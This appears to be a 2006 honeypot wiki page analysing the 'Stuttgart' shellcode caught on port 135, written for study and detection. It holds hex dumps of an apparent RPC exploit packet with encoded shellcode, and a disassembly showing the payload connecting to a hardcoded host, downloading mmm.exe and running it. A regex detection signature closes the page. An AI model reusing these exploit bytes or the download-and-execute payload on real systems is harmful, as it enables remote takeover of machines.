Stuttgart Shellcode

This problem is resolved. Port: 135
Codename: Stuttgart
Reference: cdac1b24863204a32a63dc6222870933.bin

Shellcode

raw

/*
00000000  05 00 00 03 10 00 00 00  8a 06 00 00 00 00 00 00  |................|
00000010  72 06 00 00 00 00 00 00  05 00 01 00 00 00 00 00  |r...............|
00000020  00 00 00 00 58 7d 75 75  40 eb c6 47 bc 71 4e a7  |....X}uu@..G.qN.|
00000030  1c d0 b5 97 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000040  00 00 00 00 00 00 00 00  00 00 09 00 00 03 00 00  |................|
00000050  00 00 00 00 00 03 00 00  5c 00 5c 00 90 90 90 90  |........\.\.....|
00000060  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000070  90 90 90 90 90 90 90 90  90 90 90 90 eb 10 eb 19  |................|
00000080  9f 75 18 00 23 37 f3 77  eb e0 fd 7f 90 90 90 90  |.u..#7.w........|
00000090  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000000e0  90 90 90 90 eb 04 ff ff  ff ff 90 90 90 90 90 90  |................|
000000f0  90 90 eb 04 eb 04 90 90  90 90 eb 04 ff ff ff ff  |................|
00000100  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000370  90 90 90 90 90 90 90 eb  15 b9 8b e6 13 41 81 f1  |.............A..|
00000380  d8 e7 13 41 5e 80 74 31  ff a2 e2 f9 eb 05 e8 e6  |...A^.t1........|
00000390  ff ff ff 91 79 c6 29 e1  92 29 e2 ae 29 d2 be 0f  |....y.)..)..)...|
000003a0  29 e2 aa f1 f1 ca 91 90  a2 a2 ca d5 d1 90 fd ca  |)...............|
000003b0  d0 d6 a2 a2 ca cf d1 d4  c1 4a 96 a2 a2 a2 a3 a2  |.........J......|
000003c0  a2 a2 97 c0 aa 74 d6 81  82 36 62 3b 6b 68 1b fe  |.....t...6b;kh..|
000003d0  b7 cb 1b e2 54 e2 75 a0  11 af 27 5b ef 66 3e b8  |....T.u...'[.f>.|
000003e0  a6 ba 21 a3 71 b8 62 a0  b1 a5 22 96 a1 a5 16 28  |..!.q.b..."....(|
000003f0  9b 8a ff c8 a0 f9 29 5a  f1 f1 29 f5 9e 29 f6 98  |......)Z..)..)..|
00000400  da a1 75 f0 29 f0 82 a1  75 91 79 e1 29 96 38 a1  |..u.)...u.y.).8.|
00000410  55 91 6b 0e 90 6a 63 63  a7 0e 26 62 d7 54 29 d7  |U.k..jcc..&b.T).|
00000420  a2 89 ee 17 a2 d7 46 25  96 86 29 f4 86 a1 75 c4  |......F%..)...u.|
00000430  29 ae f8 29 f4 be a1 75  29 a6 28 a1 65 fc 2b e6  |)..)...u).(.e.+.|
00000440  17 a2 5d e7 a2 f9 e9 d7  12 f9 21 61 a0 f6 5d f7  |..].......!a..].|
00000450  aa 21 66 aa 27 62 d7 3c  16 a0 89 42 28 66 f6 f2  |.!f.'b.<...B(f..|
00000460  5d f7 be f2 f2 ca f6 0f  d6 49 ca a0 a2 88 37 29  |]........I....7)|
00000470  5e f2 c8 a3 c8 a0 5d f7  82 29 7a c8 b2 f5 f1 5d  |^.....]..)z....]|
00000480  f7 86 27 62 d7 fb 65 e7  a2 a1 a2 a2 a2 f2 c8 a6  |..'b..e.........|
00000490  f7 f1 5d f7 8e 29 56 65  e7 a2 d5 c0 a2 a2 ca c7  |..]..)Ve........|
000004a0  da c7 a2 ca d8 d8 d8 8c  29 5e f7 f5 5d f7 ae 2b  |........)^..]..+|
000004b0  e7 a2 c8 a2 ca a2 a0 a2  a2 f4 f1 5d f7 8a 27 62  |...........]..'b|
000004c0  d6 b3 da b9 5d d7 a2 f2  c8 a3 f4 5d f7 b2 21 66  |....]......]..!f|
000004d0  b2 49 7d 5d d7 a2 5d f7  b6 f2 f6 f5 5d f7 ba f1  |.I}]..].....]...|
000004e0  5d f7 92 5d f7 a6 62 62  62 62 62 62 62 62 62 62  |]..]..bbbbbbbbbb|
000004f0  62 62 62 62 62 62 62 62  62 62 62 62 62 62 62 62  |bbbbbbbbbbbbbbbb|
*
000005d0  62 62 8b 45 30 05 24 fb  ff ff ff e0 eb f4 62 62  |bb.E0.$.......bb|
000005e0  0b 0b 1b 00 62 62 62 62  62 62 62 62 62 62 62 62  |....bbbbbbbbbbbb|
000005f0  62 62 62 62 62 62 62 62  62 62 62 62 62 62 62 62  |bbbbbbbbbbbbbbbb|
*
00000610  62 62 62 62 62 62 62 62  eb 06 62 62 59 1c 00 01  |bbbbbbbb..bbY...|
00000620  8b 44 24 fc 05 e0 fa ff  ff ff e0 62 62 62 62 62  |.D$........bbbbb|
00000630  62 62 62 62 62 62 62 62  62 62 62 62 62 62 62 62  |bbbbbbbbbbbbbbbb|
00000640  62 62 62 62 62 62 62 62  62 62 62 62 62 62 5c 00  |bbbbbbbbbbbbbb\.|
00000650  41 00 00 00 00 00 00 00  00 00 00 00 02 00 00 00  |A...............|
00000660  00 00 00 00 01 00 00 00  68 1c 09 00 01 00 00 00  |........h.......|
00000670  00 00 00 00 00 00 00 00  c0 00 00 00 00 00 00 46  |...............F|
00000680  01 00 00 00 01 00 00 00  07 00                    |..........|
0000068a

00000000  05 00 00 03 10 00 00 00  8a 06 00 00 00 00 00 00  |................|
00000010  72 06 00 00 00 00 00 00  05 00 01 00 00 00 00 00  |r...............|
00000020  00 00 00 00 58 7d 75 75  40 eb c6 47 bc 71 4e a7  |....X}uu@..G.qN.|
00000030  1c d0 b5 97 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000040  00 00 00 00 00 00 00 00  00 00 09 00 00 03 00 00  |................|
00000050  00 00 00 00 00 03 00 00  5c 00 5c 00 90 90 90 90  |........\.\.....|
00000060  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000070  90 90 90 90 90 90 90 90  90 90 90 90 eb 10 eb 19  |................|
00000080  9f 75 18 00 23 37 f3 77  eb e0 fd 7f 90 90 90 90  |.u..#7.w........|
00000090  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000000e0  90 90 90 90 eb 04 ff ff  ff ff 90 90 90 90 90 90  |................|
000000f0  90 90 eb 04 eb 04 90 90  90 90 eb 04 ff ff ff ff  |................|
00000100  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000370  90 90 90 90 90 90 90 eb  15 b9 8b e6 13 41 81 f1  |.............A..|
00000380  d8 e7 13 41 5e 80 74 31  ff a2 e2 f9 eb 05 e8 e6  |...A^.t1........|
00000390  ff ff ff 91 79 c6 29 e1  92 29 e2 ae 29 d2 be 0f  |....y.)..)..)...|
000003a0  29 e2 aa f1 f1 ca 91 90  a2 a2 ca d5 d1 90 fd ca  |)...............|
000003b0  d0 d6 a2 a2 ca cf d1 d4  c1 4a 96 a2 a2 a2 a3 a2  |.........J......|
000003c0  a2 a2 97 c0 aa 74 d6 81  82 36 62 3b 6b 68 1b fe  |.....t...6b;kh..|
000003d0  b7 cb 1b e2 54 e2 75 a0  11 af 27 5b ef 66 3e b8  |....T.u...'[.f>.|
000003e0  a6 ba 21 a3 71 b8 62 a0  b1 a5 22 96 a1 a5 16 28  |..!.q.b..."....(|
000003f0  9b 8a ff c8 a0 f9 29 5a  f1 f1 29 f5 9e 29 f6 98  |......)Z..)..)..|
00000400  da a1 75 f0 29 f0 82 a1  75 91 79 e1 29 96 38 a1  |..u.)...u.y.).8.|
00000410  55 91 6b 0e 90 6a 63 63  a7 0e 26 62 d7 54 29 d7  |U.k..jcc..&b.T).|
00000420  a2 89 ee 17 a2 d7 46 25  96 86 29 f4 86 a1 75 c4  |......F%..)...u.|
00000430  29 ae f8 29 f4 be a1 75  29 a6 28 a1 65 fc 2b e6  |)..)...u).(.e.+.|
00000440  17 a2 5d e7 a2 f9 e9 d7  12 f9 21 61 a0 f6 5d f7  |..].......!a..].|
00000450  aa 21 66 aa 27 62 d7 3c  16 a0 89 42 28 66 f6 f2  |.!f.'b.<...B(f..|
00000460  5d f7 be f2 f2 ca f6 0f  94 0b ca a0 a2 6d 59 29  |]............mY)|
00000470  5e f2 c8 a3 c8 a0 5d f7  82 29 7a c8 b2 f5 f1 5d  |^.....]..)z....]|
00000480  f7 86 27 62 d7 fb 65 e7  a2 a4 a2 a2 a2 f2 c8 a6  |..'b..e.........|
00000490  f7 f1 5d f7 8e 29 56 65  e7 a2 d5 c0 a2 a2 ca c7  |..]..)Ve........|
000004a0  da c7 a2 ca cf cf cf 8c  29 5e f7 f5 5d f7 ae 2b  |........)^..]..+|
000004b0  e7 a2 c8 a2 ca a2 a0 a2  a2 f4 f1 5d f7 8a 27 62  |...........]..'b|
000004c0  d6 b3 da b9 5d d7 a2 f2  c8 a3 f4 5d f7 b2 21 66  |....]......]..!f|
000004d0  b2 49 7d 5d d7 a2 5d f7  b6 f2 f6 f5 5d f7 ba f1  |.I}]..].....]...|
000004e0  5d f7 92 5d f7 a6 76 76  76 76 76 76 76 76 76 76  |]..]..vvvvvvvvvv|
000004f0  76 76 76 76 76 76 76 76  76 76 76 76 76 76 76 76  |vvvvvvvvvvvvvvvv|
*
000005d0  76 76 8b 45 30 05 24 fb  ff ff ff e0 eb f4 76 76  |vv.E0.$.......vv|
000005e0  0b 0b 1b 00 76 76 76 76  76 76 76 76 76 76 76 76  |....vvvvvvvvvvvv|
000005f0  76 76 76 76 76 76 76 76  76 76 76 76 76 76 76 76  |vvvvvvvvvvvvvvvv|
*
00000610  76 76 76 76 76 76 76 76  eb 06 76 76 59 1c 00 01  |vvvvvvvv..vvY...|
00000620  8b 44 24 fc 05 e0 fa ff  ff ff e0 76 76 76 76 76  |.D$........vvvvv|
00000630  76 76 76 76 76 76 76 76  76 76 76 76 76 76 76 76  |vvvvvvvvvvvvvvvv|
00000640  76 76 76 76 76 76 76 76  76 76 76 76 76 76 5c 00  |vvvvvvvvvvvvvv\.|
00000650  41 00 00 00 00 00 00 00  00 00 00 00 02 00 00 00  |A...............|
00000660  00 00 00 00 01 00 00 00  68 1c 09 00 01 00 00 00  |........h.......|
00000670  00 00 00 00 00 00 00 00  c0 00 00 00 00 00 00 46  |...............F|
00000680  01 00 00 00 01 00 00 00  07 00                    |..........|
0000068a

unxor'd

FIXME

Analysis

xor decoder

00402007   eb 15            jmp short stuttgar.0040201e
00402009   b9 8be61341      mov ecx,4113e68b
0040200e   81f1 d8e71341    xor ecx,4113e7d8
00402014   5e               pop esi
00402015   807431 ff a2     xor byte ptr ds:[ecx+esi-1],0a2
0040201a  ^e2 f9            loopd short stuttgar.00402015

unxor'd shellcode

0040201c   eb 05            jmp short stuttgar.00402023
0040201e   e8 e6ffffff      call stuttgar.00402009
00402023   33db             xor ebx,ebx

00402025   64:8b43 30       mov eax,dword ptr fs:[ebx+30]
00402029   8b40 0c          mov eax,dword ptr ds:[eax+c]
0040202c   8b70 1c          mov esi,dword ptr ds:[eax+1c]
0040202f   ad               lods dword ptr ds:[esi]
00402030   8b40 08          mov eax,dword ptr ds:[eax+8]
00402033   53               push ebx
00402034   53               push ebx
00402035   68 33320000      push 3233
0040203a   68 7773325f      push 5f327377
0040203f   68 72740000      push 7472
00402044   68 6d737663      push 6376736d
00402049   e8 34000000      call stuttgar.00402082
0040204e   d0b6 0378e275    sal byte ptr ds:[esi+75e27803],1         ; --------- no code below
00402054   e7 77            out 77,eax                               ; i/o command
00402056   54               push esp
00402057   a2 e777c21b      mov byte ptr ds:[1bc277e7],al
0040205c   0278 9c          add bh,byte ptr ds:[eax-64]
0040205f   40               inc eax
00402060   0278 b8          add bh,byte ptr ds:[eax-48]
00402063   0e               push cs
00402064   0178 54          add dword ptr ds:[eax+54],edi
00402067   8c01             mov word ptr ds:[ecx],es
00402069   78 15            js short stuttgar.00402080
0040206b   3e:fa            cli                                      ; superfluous prefix
0040206d  ^74 f4            je short stuttgar.00402063
0040206f   1e               push ds
00402070   fa               cli
00402071   74 53            je short stuttgar.004020c6
00402073   c4fa             les edi,edx                              ; illegal use of register
00402075  ^74 ae            je short stuttgar.00402025
00402077   a1 fa740fc1      mov eax,dword ptr ds:[c10f74fa]
0040207c   fa               cli
0040207d  ^74 b6            je short stuttgar.00402035
0040207f   13fa             adc edi,edx
00402081   74 5d            je short stuttgar.004020e0
00402083   6a 02            push 2
00402085   5b               pop ebx
00402086   8bf8             mov edi,eax
00402088   53               push ebx
00402089   53               push ebx
0040208a   8b57 3c          mov edx,dword ptr ds:[edi+3c]
0040208d   8b543a 78        mov edx,dword ptr ds:[edx+edi+78]
00402091   03d7             add edx,edi
00402093   52               push edx
00402094   8b52 20          mov edx,dword ptr ds:[edx+20]
00402097   03d7             add edx,edi
00402099   33db             xor ebx,ebx
0040209b   43               inc ebx
0040209c   8b349a           mov esi,dword ptr ds:[edx+ebx*4]
0040209f   03f7             add esi,edi
004020a1   33c9             xor ecx,ecx
004020a3   ac               lods byte ptr ds:[esi]
004020a4   32c8             xor cl,al
004020a6   c1c1 05          rol ecx,5
004020a9   ac               lods byte ptr ds:[esi]
004020aa   84c0             test al,al
004020ac  ^75 f6            jnz short stuttgar.004020a4
004020ae   8b75 00          mov esi,dword ptr ss:[ebp]
004020b1   2b4cb5 00        sub ecx,dword ptr ss:[ebp+esi*4]
004020b5  ^75 e4            jnz short stuttgar.0040209b
004020b7   873424           xchg dword ptr ss:[esp],esi
004020ba   8b56 24          mov edx,dword ptr ds:[esi+24]
004020bd   03d7             add edx,edi
004020bf   66:8b0c5a        mov cx,word ptr ds:[edx+ebx*2]
004020c3   8b56 1c          mov edx,dword ptr ds:[esi+1c]
004020c6   03d7             add edx,edi
004020c8   8b048a           mov eax,dword ptr ds:[edx+ecx*4]
004020cb   03c7             add eax,edi
004020cd   5e               pop esi
004020ce   8944b5 00        mov dword ptr ss:[ebp+esi*4],eax
004020d2   ff45 00          inc dword ptr ss:[ebp]
004020d5   5b               pop ebx
004020d6   4b               dec ebx
004020d7  ^75 b0            jnz short stuttgar.00402089
004020d9   5b               pop ebx
004020da   83c3 02          add ebx,2
004020dd   54               push esp
004020de   ff55 08          call dword ptr ss:[ebp+8]
004020e1   83c4 08          add esp,8
004020e4   85c0             test eax,eax
004020e6  ^75 9e            jnz short stuttgar.00402086
004020e8   b4 02            mov ah,2
004020ea   2be0             sub esp,eax
004020ec   8ac4             mov al,ah
004020ee   54               push esp
004020ef   50               push eax
004020f0   ff55 1c          call dword ptr ss:[ebp+1c]               ; wsastartup
004020f3   50               push eax
004020f4   50               push eax
004020f5   68 54a654c2      push c254a654                            ; ip
004020fa   68 0200c50d      push 0dc50002                            ; port
004020ff   8bfc             mov edi,esp
00402101   50               push eax
00402102   6a 01            push 1
00402104   6a 02            push 2
00402106   ff55 20          call dword ptr ss:[ebp+20]               ; socket
00402109   8bd8             mov ebx,eax
0040210b   6a 10            push 10
0040210d   57               push edi
0040210e   53               push ebx
0040210f   ff55 24          call dword ptr ss:[ebp+24]               ; connect
00402112   85c0             test eax,eax
00402114   75 59            jnz short stuttgar.0040216f
00402116   c745 00 03000000 mov dword ptr ss:[ebp],3
0040211d   50               push eax
0040211e   6a 04            push 4
00402120   55               push ebp
00402121   53               push ebx
00402122   ff55 2c          call dword ptr ss:[ebp+2c]               ; send
00402125   8bf4             mov esi,esp
00402127   c745 00 77620000 mov dword ptr ss:[ebp],6277
0040212e   68 65786500      push 657865
00402133   68 6d6d6d2e      push 2e6d6d6d
00402138   8bfc             mov edi,esp
0040213a   55               push ebp
0040213b   57               push edi
0040213c   ff55 0c          call dword ptr ss:[ebp+c]                ; fopen // mmm.exe
0040213f   8945 00          mov dword ptr ss:[ebp],eax
00402142   6a 00            push 0
00402144   68 00020000      push 200
00402149   56               push esi
0040214a   53               push ebx
0040214b   ff55 28          call dword ptr ss:[ebp+28]               ; recv
0040214e   85c0             test eax,eax
00402150   74 11            je short stuttgar.00402163
00402152   78 1b            js short stuttgar.0040216f
00402154   ff75 00          push dword ptr ss:[ebp]
00402157   50               push eax
00402158   6a 01            push 1
0040215a   56               push esi
0040215b   ff55 10          call dword ptr ss:[ebp+10]               ; fwrite
0040215e   83c4 10          add esp,10
00402161  ^eb df            jmp short stuttgar.00402142
00402163   ff75 00          push dword ptr ss:[ebp]
00402166   ff55 14          call dword ptr ss:[ebp+14]               ; fclose
00402169   50               push eax
0040216a   54               push esp
0040216b   57               push edi
0040216c   ff55 18          call dword ptr ss:[ebp+18]               ; _execv
0040216f   53               push ebx                                 ; error/end
00402170   ff55 30          call dword ptr ss:[ebp+30]
00402173   ff55 04          call dword ptr ss:[ebp+4]

Pattern

/*
 * Detection signature for the Stuttgart shellcode's network stage.
 *
 * The literal holds regex text, not raw bytes: every backslash is doubled so
 * the C compiler emits "\x50" and the pattern engine is what decodes it.  The
 * "(....)" / "(..)" groups are capture groups for the per-sample fields.
 *
 * Segments track the decoded listing at 004020f3-00402122: push eax; push eax;
 * push <addr> (group 1), push <port dword> (group 2), socket via [ebp+20],
 * connect via [ebp+24] plus its error branch, the dword stored at [ebp]
 * (group 3, 3 in this sample), and the 4-byte send via [ebp+2c].
 */
const char *stuttgart =
	"\\x50\\x50\\x68"          /* push eax ; push eax ; push imm32            */
	"(....)"                   /* group 1: pushed address (listing: "ip")    */
	"\\x68\\x02\\x00"          /* push imm32, low word 0x0002 fixed           */
	"(..)"                     /* group 2: high word (listing: "port")       */
	"\\x8B\\xFC"               /* mov edi,esp                                 */
	"\\x50\\x6A\\x01\\x6A\\x02" /* push eax ; push 1 ; push 2                  */
	"\\xFF\\x55\\x20"          /* call [ebp+20] -- socket                     */
	"\\x8B\\xD8"               /* mov ebx,eax                                 */
	"\\x6A\\x10\\x57\\x53"     /* push 10 ; push edi ; push ebx               */
	"\\xFF\\x55\\x24"          /* call [ebp+24] -- connect                    */
	"\\x85\\xC0\\x75\\x59"     /* test eax,eax ; jnz <error/end>              */
	"\\xC7\\x45\\x00"          /* mov dword [ebp], imm32                      */
	"(....)"                   /* group 3: the stored dword (3 here)          */
	"\\x50\\x6A\\x04\\x55\\x53" /* push eax ; push 4 ; push ebp ; push ebx     */
	"\\xFF\\x55\\x2C";         /* call [ebp+2c] -- send                       */
 
csni/shellcodes/stuttgart.txt · Last modified: 2006/02/17 14:01
 